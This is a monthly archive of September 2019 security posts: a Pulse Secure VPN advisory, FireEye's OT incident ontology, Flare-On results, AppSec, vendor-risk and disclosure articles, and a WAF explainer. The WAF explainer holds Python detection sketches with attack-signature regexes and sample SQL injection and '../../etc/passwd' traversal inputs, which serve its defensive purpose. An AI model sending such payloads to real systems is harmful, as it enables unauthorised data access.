Monthly Archives: September 2019

Advisory – 2019-129: File Disclosure Vulnerability in Pulse Connect Secure VPN Software

Overview

The Australian Signals Directorate’s Australian Cyber Security Centre is aware of a vulnerability in the Pulse Connect Secure Virtual Private Network (VPN) solution. We advise users to ensure their systems are patched and up to date. The vulnerability, tracked as CVE-2019-11510, was initially disclosed in April 2019 but has resurfaced following multiple reports of exploitation and the publication of working exploits on Pastebin and GitHub.

The FireEye OT-CSIO: An Ontology to Understand, Cross-Compare, and Assess Operational Technology Cyber Security Incidents

The FireEye Operational Technology Cyber Security Incident Ontology (OT-CSIO)

While the number of threats to operational technology (OT) has significantly increased since the discovery of Stuxnet – driven by factors such as the growing convergence with information technology (IT) networks and the increasing availability of OT information, technology, software, and reference materials – we have observed only a small number of real-world OT-focused attacks. The limited sample size of well-documented OT attacks and the lack of macro-level analysis represent a challenge for defenders and security leaders trying to make informed security decisions and risk assessments.

To help address this problem, FireEye Intelligence developed the OT Cyber Security Incident Ontology (OT-CSIO) to aid communication with executives and to provide guidance for assessing risks. We highlight that the OT-CSIO focuses on high-level analysis and is not meant to provide in-depth insight into the nuances of each incident.

Our methodology evaluates four categories: targeting, impact, sophistication, and affected equipment architecture based on the Purdue Model (Table 7). Unlike other methodologies, such as MITRE's ATT&CK Matrix, FireEye Intelligence's OT-CSIO evaluates only the full aggregated attack lifecycle and the ultimate impact. It does not describe the tactics, techniques, and procedures (TTPs) implemented at each step of the incident. Table 1 describes the four categories. Detailed information about each class is provided in Appendix 1.
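As a rough illustration of the ontology's structure (not FireEye's actual schema), the four categories could be encoded as a small data model. All class names, field names, and the example category values below are assumptions for demonstration only:

```python
from dataclasses import dataclass
from enum import Enum

# Hypothetical encoding of the four OT-CSIO categories; names and
# values are illustrative, not FireEye's official schema.
class Targeting(Enum):
    TARGETED = "targeted"
    NON_TARGETED = "non-targeted"

class Sophistication(Enum):
    LOW = 1
    MEDIUM = 2
    HIGH = 3

class Impact(Enum):
    DATA_COMPROMISE = "data compromise"
    DATA_THEFT = "data theft"
    DEGRADATION = "degradation"
    DISRUPTION = "disruption"
    DESTRUCTION = "destruction"

@dataclass
class Incident:
    name: str
    targeting: Targeting
    sophistication: Sophistication
    impact: Impact
    zones: str  # Purdue Model zones, e.g. "2-3"

# Example classification; the sophistication and impact values here are
# illustrative guesses, not figures from the FireEye report.
incident = Incident(
    name="WannaCry Infection on HMIs",
    targeting=Targeting.NON_TARGETED,  # ransomware is non-targeted per the ontology
    sophistication=Sophistication.LOW,
    impact=Impact.DISRUPTION,
    zones="2-3",
)
```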

Table 1: Categories for FireEye Intelligence's OT-CSIO

The OT-CSIO In Action

In Table 2 we list nine real-world incidents impacting OT systems categorized according to our ontology. We highlight that the ontology only reflects the ultimate impact of an incident, and it does not account for every step throughout the attack lifecycle. As a note, we cite public sources where possible, but reporting on some incidents is available to FireEye Threat Intelligence customers only.





Incident | Impact | Impacted Equipment
Maroochy Shire Sewage Spill | | Zone 3
| | Zones 1-2
| | Zone 4-5
Ukraine Power Outage | Disruption, Destruction | Zone 2
Ukraine Power Outage | | Zones 0-3
WannaCry Infection on HMIs | | Zone 2-3
TEMP.Isotope Reconnaissance Campaign | Data Theft | Zones 2-4
| Disruption (likely building destructive capability) | Zone Safety, 1-5
Cryptomining Malware on European Water Utility | | Zone 2/3
Financially Motivated Threat Actor Accesses HMI While Searching for POS Systems | | Zone 2/3
Portable Executable File Infecting Malware Impacting Windows-based OT assets | | Zone 2-3

Table 2: Categorized samples using the OT-CSIO

The OT-CSIO Matrix Facilitates Risk Management and Analysis

Risk management for OT cyber security is a significant challenge given the difficulty of assessing and communicating the implications of high-impact, low-frequency events. Additionally, many risk assessment methodologies rely on background information to determine case scenarios, so the quality of the analysis depends on the background information used to develop the models or identify attack vectors. With this in mind, the following matrix provides a baseline of incidents that can be used to learn from past cases and to support strategic analysis of future scenarios for attacks that remain unseen, but feasible.

Table 3: The FireEye OT-CSIO Matrix

As Table 3 illustrates, we have only identified examples for a limited set of OT cyber security incident types. Additionally, some cases are very unlikely to occur. For example, medium- and high-sophistication non-targeted incidents remain unseen, even if feasible. Similarly, medium- and high-sophistication data compromises on OT may remain undetected. While this type of activity may be common, data compromises are often just a component of the attack lifecycle, rather than an end goal.

How to Use the OT-CSIO Matrix

The OT-CSIO Matrix presents multiple benefits for assessing OT threats from a macro-level perspective, given that it categorizes different types of incidents and invites further analysis of cases that have not yet been documented but may still represent a risk to organizations. Here are some examples of how to use this ontology:

  • Classify different types of attacks and develop cross-case analysis to identify differences and similarities. Knowledge about past incidents can be helpful to prevent similar scenarios and to think about threats that have not been evaluated by an organization.
  • Leverage the FireEye OT-CSIO Matrix for communication with executives by sharing a visual representation of different types of threats, their sophistication and possible impacts. This tool can make it easier to communicate risk despite the limited data available for high-impact, low-frequency events. The ontology provides an alternative to assess risk for different types of incidents based on the analysis of sophistication and impact, where increased sophistication and impact generally equates to higher risk.
  • Develop additional case scenarios to foresee threats that have not been observed yet but may become relevant in the future. Use this information as support while working on risk assessments.


FireEye Intelligence's OT-CSIO seeks to compile complex incidents into practical diagrams that facilitate communication and analysis. Categorizing these events is useful for visualizing the full threat landscape, gaining knowledge about previously documented incidents, and considering alternative scenarios that have not yet been seen in the wild. Given that the field of OT cyber security is still developing, and the number of well-documented incidents is still low, categorization represents an opportunity to grasp tendencies and ultimately identify security gaps.

Appendix 1: OT-CSIO Class Definitions


Targeting

This category comprises cyber incidents that target industrial control systems (ICS) and non-targeted incidents that collaterally or coincidentally impact ICS, such as ransomware.

Table 4: Target category


Sophistication

Sophistication refers to the technical and operational sophistication of attacks. There are three levels of sophistication, which are determined by the analyst based on the following criteria.

Table 5: Sophistication category


Impact

The ontology reflects impact on the process or systems, not the resulting environmental impacts. There are five classes in this category: data compromise, data theft, degradation, disruption, and destruction.

Table 6: Impact category

Impacted Equipment

This category is divided based on FireEye Intelligence's adaptation of the Purdue Model. For the purpose of this ontology, we add an additional zone for safety systems.

Table 7: Impacted equipment

2019 Flare-On Challenge Solutions

We are pleased to announce the conclusion of the sixth annual Flare-On Challenge. The popularity of this event continues to grow and this year we saw a record number of players as well as finishers. We will break down the numbers later in the post, but right now let’s look at the fun stuff: the prize! Each of the 308 dedicated and amazing players that finished our marathon of reverse engineering this year will receive a medal. These hard-earned awards will be shipping soon. Incidentally, the number of finishers smashed our estimates, so we have had to order more prizes.

We would like to thank the challenge authors individually for their great puzzles and solutions.

  1. Memecat Battlestation: Nick Harbour (@nickaharbour)
  2. Overlong: Eamon Walsh
  3. FlareBear: Moritz Raabe (@m_r_tz)
  4. DnsChess: Eamon Walsh
  5. 4k demo: Christopher Gardner (@t00manybananas)
  6. Bmphide: Tyler Dean (@spresec)
  7. Wopr: Sandor Nemes (@sandornemes)
  8. Snake: Alex Rich (@AlexRRich)
  9. Reloaderd: Sebastian Vogl
  10. MugatuWare: Blaine Stancill (@MalwareMechanic)
  11. vv_max: Dhanesh Kizhakkinan (@dhanesh_k)
  12. help: Ryan Warns (@NOPAndRoll)

And now for the stats. As of 10:00am ET, participation was at an all-time high, with 5,790 players registered and 3,228 finishing at least one challenge. This year had the most finishers ever with 308 players completing all twelve challenges.

The U.S. reclaimed the top spot for total finishers with 29. Singapore strengthened its already unbelievable position as the top per-capita Flare-On finishing country, with one finisher for every 224,000 people living in Singapore. Rounding out the top five are the consistently high-finishing countries of Vietnam, Russia, and China.


All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11
  12. SOLUTION #12

Know Your Audience to Make the Case for AppSec

Selling senior-level executives on any new concept can often feel like a trek up a mountain with a 60-pound pack on your back. So, how can you take your application security program to a new and better level with less effort? You focus on what’s really important: getting the right message to the right audience in a language they speak and connect with. Because when people hear things in terms that matter to them — and there’s persuasive evidence on hand — they stop resisting and even embrace the change.

But sending one message to the multiple leaders involved in a decision-making process is a mistake. Refining your message appropriately by focusing on the information relevant to each group will help you build credibility, more effectively communicate your vision, and more easily gain buy-in. It’s an approach that extends far beyond AppSec, but it has particular relevancy in this space.

On Target

Any successful salesperson understands that it’s easier to close a sale when you communicate selling points that really matter to your audience. The same holds true when you are “selling” AppSec internally. Your success hinges on understanding your strategic arc over the course of months and years, establishing metrics and KPIs that demonstrate your progress, and connecting all of this to tangible benefits for the people who hold the purse strings and can greenlight your initiative, and whose support you need for the successful implementation and administration of your program.

You can gain the support you need by building a basic business case for the key groups in your organization, and ensuring that each stakeholder receives the specific information they need in words, figures, and graphics they understand. Whether it’s showing them how your AppSec program cuts costs, scales up efficiencies, fuels your DevOps strategies, or improves the company’s overall trust with business partners and customers, hitting the target matters. It’s crucial to document actual problems and incidents, and then use company data to support your case.

First Things First

Here are six key ways to gain C-suite executive buy-in for AppSec:

  • Avoid acronyms and technical jargon. Nothing confuses and distracts business leaders more than the use of unnecessary technical terms.
  • Use visuals instead of text. Display risks and potential costs in graphics that clearly illustrate potential losses and damage. Rely on numbers, and especially actual dollar figures, to gain credibility. And be sure to refine your message appropriately for each executive. For example, telling your CFO that you’ve reduced SQL injection vulnerabilities by 30 percent most likely won’t resonate. Your CFO wants to know the actual business value of reducing breaches. The CISO wants to understand how AppSec ties into the overall information security program, and the CIO is concerned with the cost of deliver/service and the cost of downtime. Know your audience’s priorities, and speak their language.
  • Forget “features” and emphasize “risks.” Avoid a discussion about specific security products and what they can do —you run the risk of being seen simply as a technologist rather than a strategic partner. Instead, build a case around potential brand damage with industry metrics, benchmarks, and potential costs. Nearly two-thirds of company directors who responded to a Veracode and NYSE Governance Services survey said they prefer high-level strategy descriptions and risk metrics over information about security technologies.
  • Identify your organization’s pain points. Find a compelling event, such as a recent high-profile security breach, a prospect asking for a security audit, or even a lost sale due to security issues. Present actual data from past incidents to demonstrate how your organization will benefit from AppSec.
  • Pinpoint pet projects. Find something key stakeholders have a burning interest in, and make that your focus. For instance, if your organization’s customers are expressing concerns about privacy and security to your customer service reps, and one of your stakeholders is taking the lead on that issue, attach your cause to that issue. Quantifying the extent of the problem and presenting it to your leaders in a way that clearly illustrates how effective your solutions could be will likely sway decision-makers in your favor.
  • Focus on dollars. The same survey noted above found that among the 200 directors of public companies across a wide swath of industries who responded, 41 percent cited the cost of brand damage — including cleanup, lawsuits, forensics, and credit reporting costs — as a top concern.

Ultimately, anyone selling an AppSec program to their organization’s top decision-makers should take the time to identify risk benchmarks as compared to their industry peers — and what these mean in both practical terms and actual dollars. A focus on real-world issues and results, tied to what matters for specific stakeholders, can significantly boost your odds of success.

For more information about how to promote AppSec, check out our new guide, Building a Business Case for Expanding Your AppSec Program.

5 Steps to Managing Security Risks Associated with Your Partners & Vendors

Today most businesses find themselves requiring a strategic partnership with a third party to address many different business needs and requirements. These partnerships typically benefit the primary company in the form of cost savings (labor/operational), increased quality of a product or service, or increased speed with which the product or service is delivered. Additionally, partnerships may be used to address deficiencies within the business operation, such as a talent shortage. Organizations may even be compelled to partner with a third party by industry or regulatory compliance mandates, as is the case with PCI-DSS or GLBA, to name a couple of examples.

These strategic partnerships certainly provide a benefit to the primary organization, but also introduce an additional level of risk. A Soha Systems survey indicates 63 percent of all data breaches are linked directly or indirectly to third-party access. From a network and information security stance, an organization’s security posture is only as strong as its weakest link.

We’ve seen headlines in the news that illustrate this time and time again. Take, for instance, the recent DoorDash breach that exposed the data of 4.9M merchants, customers, and workers as a result of a third-party service provider. Or the infamous 2013 Target breach, in which Target’s corporate network was compromised through a contracted third-party HVAC company, Fazio Mechanical. The attack began with a phishing email that led to malware installation on Fazio Mechanical’s systems and continued until the attackers had infected Target’s POS terminals and stolen customer data. Because of relaxed security policies, practices, and implementations at both companies, Target incurred an $18.5M lawsuit settlement, damage to its reputation and the resulting lost business, as well as the resources expended to significantly improve its security posture and reduce the possibility of future attacks.

Even if the security risk started with or is wholly due to a service provider’s lax security posture, the primary organization will ultimately bear responsibility for the breach, especially in the mind of the customer. From a legal standpoint, the main organization may often find it difficult to demonstrate that sufficient steps were taken to manage its third-party risk and could be considered liable for the breach and therefore held responsible for the ensuing costs of remediation.

It can be a difficult task to mitigate the inherited risks associated with a company’s security posture over which you have little control. Naturally, how a given organization manages any risk will depend greatly on the business requirements and goals of that organization.

The following are steps any organization can take to begin the process of managing third-party risks:

Step 1: Obtain Executive leadership buy-in and support.

This is essential for any risk management program to succeed.  Leadership support will provide necessary oversight and will stress the importance of this endeavor to the entire organization.

Step 2: Perform a thorough in-house risk and vulnerability assessment to gauge your organization’s security posture.

Implement any needed changes and address any deficiencies to your own organization’s acceptable risk level.

Step 3: Evaluate the security policies, procedures, and implementations of current partners to assess the risk they may pose to your organization.

If deficiencies are discovered, have conversations with the partner organization to address these gaps.  This may involve revisiting current contracts.

Step 4: Prior to contracting with potential vendors, investigate the security practices of these organizations and discuss expectations of how information security will be handled should a partnership be realized.

Due  diligence is vital in evaluating the security posture and risks posed by these potential alliances.

Step 5: To remain successful, implement a risk management program that includes ongoing risk measurement and evaluation through auditing and monitoring.

New risks and vulnerabilities may appear at any time and an organization must be adaptable to these changes.
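The ongoing measurement described in steps 3 through 5 could be tracked in something as simple as a vendor risk register. A minimal sketch follows; the field names, risk scale, and review cadence are illustrative assumptions, not a prescribed standard:

```python
from dataclasses import dataclass, field
from datetime import date
from typing import List, Optional

# Hypothetical minimal vendor risk register reflecting steps 3-5 above;
# field names and the 1-5 risk scale are illustrative.
@dataclass
class VendorAssessment:
    vendor: str
    risk_score: int                      # 1 (low) to 5 (critical), per your own scale
    findings: List[str] = field(default_factory=list)
    last_reviewed: Optional[date] = None

    def needs_review(self, today: date, max_age_days: int = 365) -> bool:
        """Step 5: flag vendors whose assessment has gone stale."""
        if self.last_reviewed is None:
            return True  # never assessed: always due
        return (today - self.last_reviewed).days > max_age_days

register = [
    VendorAssessment("HVAC Co", 4, ["shared credentials"], date(2018, 1, 15)),
    VendorAssessment("Payroll SaaS", 2, [], date(2019, 6, 1)),
]

# Ongoing monitoring: list vendors overdue for reassessment.
due = [v.vendor for v in register if v.needs_review(date(2019, 9, 30))]
print(due)  # -> ['HVAC Co']
```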

It’s not all doom and gloom when it comes to third-party partnerships. After all, they can provide significant value to business operations. The important takeaway is that their risks are your risks, and your organization will bear the burden should an incident occur. By implementing a risk management program following the steps above, you can mitigate third-party risk, giving you peace of mind and long-term success.

The post 5 Steps to Managing Security Risks Associated with Your Partners & Vendors appeared first on GRA Quantum.

GRA Quantum Named to 2019 MSSP Alert Top 200 Managed Security Services Providers List

Third Annual List Honors Leading MSSPs, MDR Service Providers & Cybersecurity Companies

Salt Lake City, UT, Sept. 24, 2019 — MSSP Alert, published by After Nines Inc., has named GRA Quantum to the Top 200 MSSPs list for 2019. The list and research identify and honor the top 200 managed security services providers (MSSPs) that specialize in comprehensive, outsourced cybersecurity services.

Previous editions of the annual list honored 100 MSSPs. This year’s edition, at twice the size, reflects MSSP Alert’s rapidly growing readership and the world’s growing consumption of managed security services. MSSP Alert’s readership has grown every month, year over year, since launching in May 2017.

The Top 200 MSSP rankings are based on MSSP Alert’s 2019 readership survey combined with aggregated third-party research. MSSPs featured throughout the list and research proactively monitor, manage and mitigate cyber threats for businesses, government agencies, educational institutions and nonprofit organizations of all sizes.

“We’re honored to be recognized in MSSP Alert’s Top 200 MSSPs list after having only launched our Security Operations Center and Managed Security Services in 2018,” said Tom Boyden, President, GRA Quantum. “We pride ourselves in our dedication to offer comprehensive, enterprise-level MSS solutions to small and mid-sized firms.”

“Our technology-agnostic approach sets us apart from most MSS vendors,” added Jen Greulich, Director, Managed Security Services, GRA Quantum. “This allows us to select the best tools for our clients and seamlessly integrate into their existing technologies.”

“After Nines Inc. and MSSP Alert congratulate GRA Quantum on this year’s honor,” said Amy Katz, CEO of After Nines Inc. “Amid the ongoing cybersecurity talent shortage, thousands of MSPs and IT consulting firms are striving to move into the managed security market. The Top 200 list honors the MSSP market’s true pioneers.”

Learn more about GRA Quantum’s Managed Security Services.


MSSP Alert: Top 200 MSSPs 2019 – Research Highlights

The MSSP Alert readership survey revealed several major trends in the managed security services provider market. Chief among them:

  • The Top 5 business drivers for managed security services are talent shortages; regulatory compliance needs; the availability of cloud services; ransomware attacks; and SMB customers demanding security guidance from partners.
  • 69% of MSSPs now run full-blown security operations centers (SOCs) in-house, with 19% leveraging hybrid models, 8% completely outsourcing SOC services and 4% still formulating strategies.
  • The Top 10 cybersecurity vendors assisting MSSPs, in order of reader preference, are Fortinet, AT&T Cybersecurity, Cisco Systems, BlackBerry Cylance, Palo Alto Networks, Microsoft, SonicWall, Carbon Black, Tenable and Webroot (a Carbonite company).
  • Although the overall MSSP market enjoys double-digit percentage growth rates, many of the Top 200 MSSPs have single-digit growth rates because they are busy investing in next-generation services – including managed detection and response (MDR), SOC as a Service, and automated penetration testing.

The Top 200 MSSPs list and research are overseen by Content Czar Joe Panettieri (@JoePanettieri).

About After Nines Inc.

After Nines Inc. provides timeless IT guidance for strategic partners and IT security professionals across ChannelE2E and MSSP Alert. ChannelE2E tracks every stage of the IT service provider journey — from entrepreneur to exit. MSSP Alert is the global voice for Managed Security Services Providers (MSSPs).

  • For sponsorship information, contact After Nines Inc. CEO Amy Katz.
  • For content and editorial questions, contact After Nines Inc. Content Czar Joe Panettieri.

The post GRA Quantum Named to 2019 MSSP Alert Top 200 Managed Security Services Providers List appeared first on GRA Quantum.

Scientists invent new technology to print invisible messages

Messages can only be seen under UV light and can be erased using a hairdryer

Forget lemon juice and hot irons, there is a new way to write and read invisible messages – and it can be used again and again.

The approach, developed by researchers in China, involves using water to print messages on paper coated with manganese-containing chemicals. The message, invisible to the naked eye, can be read by shining UV light on the paper.


What Types of Threat Detection Technologies Are There for WAF (Web Application Firewall) Solutions?

Threat detection is at the core of a WAF’s capabilities to accurately identify and block incoming attacks. However, not all threat engines are built the same.

Many WAF vendors use the engine of ModSecurity, an open-source web application firewall, for their core rule set.

This core rule set contains a set of generic attack detection rules that provide protection against many common attack categories, including SQL Injection (SQLi), Cross Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and more. 

As mentioned, ModSecurity’s threat detection engine is free, open-source software that forms the basis of many WAF engines.

However, some WAF vendors use their own proprietary technology, rather than relying solely on ModSecurity’s core rule set, to protect web applications against zero-day attacks and other sophisticated web attacks.

Some of these techniques and methods include using signatures, application learning, and AI.

Take a look below at some of the threat detection techniques that are being applied for WAFs and decide for yourself what kind of WAF might be able to withstand today’s evolving threat landscape. 

Signature-based threat detection

Signature-based (or pattern-matching) models are mostly associated with traditional WAFs. 

A signature represents a pattern containing pieces of code that make up a known attack on an operating system, web server, or website.

A signature-based WAF will take a string of suspicious code and run it against its signatures. And if it matches a signature, it is subsequently blocked. 

Sounds simple enough. 

However, this approach can create problems such as false positives and false negatives, and can block legitimate users from accessing the web application (i.e., the website). Furthermore, if a malicious string of code is not recognized because no signature exists for it, it goes undetected and is not blocked by the threat detection engine.

Hackers can easily add code to the string that does not match any of the signatures, thereby bypassing the firewall and accessing the web application. 

As a result, signature-based WAFs are only able to protect applications from known vulnerabilities and cannot effectively protect against new web attacks.
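A minimal sketch of the pattern-matching approach described above, with a toy signature set. Real rule sets, such as the ModSecurity Core Rule Set, are far larger and more carefully tuned; the patterns below are illustrative only:

```python
import re

# Toy signature set: each signature is a regex describing a known attack pattern.
SIGNATURES = {
    "sql_injection": re.compile(r"(?i)\bunion\b.+\bselect\b|'\s*or\s+'1'\s*=\s*'1"),
    "xss": re.compile(r"(?i)<script\b|javascript:"),
    "path_traversal": re.compile(r"\.\./"),
}

def match_signatures(payload: str):
    """Return the names of all signatures the payload matches."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(payload)]

print(match_signatures("id=1' OR '1'='1"))             # -> ['sql_injection']
print(match_signatures("page=../../etc/passwd"))       # -> ['path_traversal']
print(match_signatures("name=alice"))                  # -> []
```

Note how trivially the last case passes: any payload that fails to match an existing pattern sails through, which is exactly the evasion weakness the text describes.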

Signature-free/signature-less threat detection

In general, third-generation WAFs will want to use both signature (pattern matching) techniques and “signature-less” techniques for threat detection.

A signature-less or signature-free WAF simply means that the WAF’s threat engine does not rely on signatures to identify and block attacks. 

Instead, the WAF uses its own rule sets (either combined with ModSecurity’s core rule set or developed entirely in-house) to intelligently identify the characteristics of an attack without relying on signatures. 

This type of WAF threat engine can detect and block attacks exploiting unknown vulnerabilities, protecting applications from never-before-seen threats.

This is not to say that signature-based models are not useful. However, unless there are regular updates to the signatures, those not updated become less useful over time. Updates may also incur additional costs. 

With signature-free techniques, signature updates are not required. For WAF customers, this means more cost savings.
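One way to picture a signature-less check is scoring structural characteristics of an input instead of matching exact strings. The features and thresholds below are illustrative assumptions, not any vendor's actual ruleset:

```python
def anomaly_score(value: str) -> int:
    """Score structural traits of a parameter value rather than exact attack strings."""
    score = 0
    specials = sum(ch in "<>'\";()|&" for ch in value)
    if specials > 3:
        score += 2               # unusually many shell/HTML metacharacters
    if len(value) > 256:
        score += 2               # oversized parameter value
    if any(kw in value.lower() for kw in ("select", "union", "exec")):
        score += 1               # SQL keywords in a form field
    if value.count("%") > 5:
        score += 1               # heavy URL-encoding, a common evasion trick
    return score

def is_suspicious(value: str, threshold: int = 3) -> bool:
    return anomaly_score(value) >= threshold

print(is_suspicious("alice"))                           # -> False
print(is_suspicious("x'; exec('<script>')--(|&)"))      # -> True
```

Because the check keys on characteristics rather than exact byte sequences, a payload mutated to dodge a specific signature can still trip it.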

Application learning/behavior-based threat detection

The parameters of an application include value ranges for form fields, HTTP methods, cookies, etc. 

An application learning model develops a “profile” by looking at data entries and other facets of the behaviors of users as it relates to each of these parameters. 

A behavior-based WAF can detect whether or not an application is behaving the way it should through these parameters. User actions are compared against expected behaviors to recognize anomalies and then trigger alerts. 

Over time, as the WAF’s threat engine updates these profiles by gathering more data on user behavior, the application-learning technology monitors responses to certain data inputs to learn what responses to expect in the future. 

Behavior not within this profile scope and previously unobserved by the WAF threat engine triggers an alert to the security team.

A behavior that triggers an alert even though it is not malicious might cause incoming web application traffic to be blocked entirely. So when a new trend emerges, it may be blocked until an actual person can review it and decide whether it is truly a threat. 

This creates several problems. First, this means more resources (i.e. people) are required to manage the WAF engine due to the manual checkups. Second, it can increase the false positive rate.

While these setbacks are also associated with conventional WAFs, a behavior-based WAF is still a significant improvement. 

As the WAF’s threat engine gathers more information on user behavior, the profile gets updated to learn what types of responses (i.e grant or block access) to give. 
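The profiling behavior described above might be sketched roughly as follows. The length and character-set heuristics are deliberately simplified assumptions, not a production learning model:

```python
from collections import defaultdict

class ParameterProfile:
    """Learn a per-parameter profile from observed traffic, then flag outliers."""

    def __init__(self):
        self.min_len = None
        self.max_len = None
        self.charset = set()

    def learn(self, value: str):
        n = len(value)
        self.min_len = n if self.min_len is None else min(self.min_len, n)
        self.max_len = n if self.max_len is None else max(self.max_len, n)
        self.charset.update(value)

    def is_anomalous(self, value: str) -> bool:
        if self.max_len is None:
            return True  # parameter never observed before
        if not (self.min_len <= len(value) <= self.max_len * 2):
            return True  # far outside the learned length range
        return any(ch not in self.charset for ch in value)

profiles = defaultdict(ParameterProfile)

# Learning phase: observe normal traffic for the "username" field.
for v in ["alice", "bob99", "carol_t"]:
    profiles["username"].learn(v)

print(profiles["username"].is_anomalous("tabor"))        # -> False: fits the profile
print(profiles["username"].is_anomalous("' OR 1=1 --"))  # -> True: unseen characters
```

The false-positive problem the text mentions is visible even here: any legitimate new username containing a character not yet observed would be flagged until the profile catches up.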

Artificial intelligence (AI)/machine learning-based threat detection

The high resource requirements sometimes needed to manage a WAF are something most companies seek to avoid.  

To address the human resource issue, machine learning-powered automated tasks can be created to continuously learn from the newest data (threat data or otherwise) without human intervention.

Machine learning enables the WAF engine to classify files and data sources much more accurately and to distinguish legitimate traffic from genuine threats. 

Very few WAFs have incorporated this type of machine learning that uses an “automated calculation of the probability that a user or application behavior represents a threat requiring a security response.” 

The WAF, in turn, uses the resulting probability, together with predefined rules, to determine how to respond to any behavioral anomalies. 

This significantly reduces false positives as compared to application learning and also reduces the need to allocate valuable staff resources to resolve false positives issues.

Machine learning can build predictive models to detect similarities between attack patterns and discover unknown patterns.
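A toy version of the "automated calculation of the probability" quoted above, using a hand-set logistic model. Real systems learn their weights from labeled traffic; the features and weights here are invented purely for illustration:

```python
import math

# Invented feature weights for demonstration; a real WAF would fit these
# to labeled traffic rather than hard-coding them.
WEIGHTS = {"special_char_ratio": 4.0, "sql_keywords": 2.5, "length_z": 1.5}
BIAS = -3.0

def extract_features(payload: str) -> dict:
    specials = sum(not ch.isalnum() and ch != " " for ch in payload)
    return {
        "special_char_ratio": specials / max(len(payload), 1),
        "sql_keywords": sum(kw in payload.lower() for kw in ("union", "select", "drop")),
        "length_z": min(len(payload) / 100.0, 3.0),
    }

def threat_probability(payload: str) -> float:
    """Logistic model: probability that the payload represents a threat."""
    z = BIAS + sum(WEIGHTS[k] * v for k, v in extract_features(payload).items())
    return 1.0 / (1.0 + math.exp(-z))

print(round(threat_probability("hello world"), 3))                         # low
print(round(threat_probability("1 UNION SELECT password FROM users--"), 3))  # high
```

Because the output is a probability rather than a binary signature hit, the response threshold can be tuned to trade false positives against false negatives.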

Deep learning-based threat detection

As a subset of machine learning, deep learning for WAF threat detection is just beginning to be explored. 

Deep learning methods are already being used for Intrusion Detection Systems (IDS) in the cybersecurity arena.

One way deep learning is being used to detect web attacks is through the usage of a CNN (Convolutional Neural Network), which can be used specifically to analyze HTTP request packets. This makes it possible to also analyze a diverse set of attack inputs and data.

CNNs are widely used in computer vision and other image-related tasks. In one example, deep learning capabilities are used to convert web attack payloads into UTF-8 hexadecimal format. 

Each payload is then turned into an image and fed into a deep learning model. With this, the machine can recognize web traffic and learn as more data is fed through it. 

Combined with core WAF capabilities, deep learning can enhance the threat detection of any WAF to more intelligently find new types of web attacks and also accurately distinguish legitimate users and illegitimate users.
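The hex-and-image preprocessing described above might look something like this sketch; the 16x16 grid size is an arbitrary assumption, chosen only to make the example concrete:

```python
def request_to_grid(request: str, width: int = 16, height: int = 16):
    """Encode an HTTP request as UTF-8 bytes and pad into a fixed-size 2D grid
    that a CNN could consume as a one-channel 'image'."""
    data = request.encode("utf-8")[: width * height]          # truncate to fit
    pixels = list(data) + [0] * (width * height - len(data))  # zero-pad the tail
    return [pixels[r * width:(r + 1) * width] for r in range(height)]

req = "GET /index.php?id=1%20UNION%20SELECT HTTP/1.1"
grid = request_to_grid(req)

print(len(grid), len(grid[0]))                   # -> 16 16
print([format(b, "02x") for b in grid[0][:4]])   # -> ['47', '45', '54', '20']  ("GET ")
```

From here, the fixed-size grid would be normalized and passed to a convolutional network for training, which is where the approach diverges from this stdlib-only sketch.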


WAF technologies are now evolving to meet the new and more sophisticated types of web threats that are arising across organizations. 

WAFs are evolving in part by incorporating new technologies into their threat engines, moving away from traditional signatures to include application learning/behavioral analysis methods, signature-free methods, and AI. 

Furthermore, big data is also making its way into WAF threat engines. One use is the analysis of global threats across individual clients’ WAFs, so that a block developed for one kind of attack on one client can be applied rapidly to other clients. 

Now that the threat landscape calls for more precise detection of both known and unknown attacks, it seems likely that organizations will also seek to deploy WAFs with greater capabilities than their predecessors. 

The post What Types of Threat Detection Technologies Are There for WAF (Web Application Firewall) Solutions? appeared first on Cloudbric.

SB220 Nevada Law

The Privacy Security and Risk Conference is next week in Las Vegas. While the conversation will most likely be dominated by the California Consumer Privacy Act (CCPA), there is another privacy law that should probably be on the agenda as well. That’s right, Nevada also has a new privacy law, specifically SB220. This new privacy […]

The post SB220 Nevada Law appeared first on Privacy Ref.

Security and Development Agree, Coordinated Disclosures Are a Public Service

Shifting security left so that security testing becomes an integrated part of the development process helps companies improve software security. With software running our world, it is important to empower developers with the tools and processes they need to make security a part of their overall development process. Yet, even with a robust AppSec program that makes security a part of the development process, new vulnerabilities are found all the time. Companies need ways to find vulnerabilities once software is released. That’s where coordinated disclosure policies come into play.

Coordinated disclosure policies allow security researchers to work with an organization to help them improve the security of their software. The conversation around vulnerability disclosure has become more nuanced over the past several years. What was once a topic that would spur intense debate is now one that invites discussion on strategy and best practices. Organizations as conservative as federal and state agencies are exploring the need for coordinated disclosure processes.

Veracode recently commissioned a report with 451 Group to explore the attitudes and perceptions around coordinated disclosure. Our intent in commissioning this research was to establish a current view of perceptions around coordinated vulnerability disclosure and to define a set of clear recommendations that help businesses progressively deliver on the objective of developing software that is secure from the start.

The report showed that 90 percent of security and development professionals believe coordinated disclosure serves a public good. This same report also found that one-third of organizations received an unsolicited vulnerability alert in the past 12 months – and that 90 percent of these were done in a coordinated manner, in which the independent security researcher worked with the company to fix the vulnerability.

As Chris Wysopal, Veracode CTO, commented on the report:

“The alignment that the study reveals is very positive,” said Veracode Chief Technology Officer and co-founder Chris Wysopal. “The challenge, however, is that vulnerability disclosure policies are wildly inconsistent. If researchers are unsure how to proceed when they find a vulnerability it leaves organizations exposed to security threats giving criminals a chance to exploit these vulnerabilities. Today, we have both tools and processes to find and reduce bugs in software during the development process. But even with these tools, new vulnerabilities are found every day. A strong disclosure policy is a necessary part of an organization’s security strategy and allows researchers to work with an organization to reduce its exposure. A good vulnerability disclosure policy will have established procedures to work with outside security researchers, set expectations on fix timelines and outcomes, and test for defects and fix software before it is shipped.”

Past perceptions of independent security researchers were that they were motivated by money from bug bounty programs or would blackmail a company into paying them for the vulnerability information. This study showed that this perception is far from the truth. Only 18 percent of security researchers expect to be paid for finding a vulnerability, and only 16 percent expect some sort of recognition. Conversely, 37 percent expect information validating the fix – suggesting independent researchers are more interested in creating more secure software than in notoriety or financial gain.

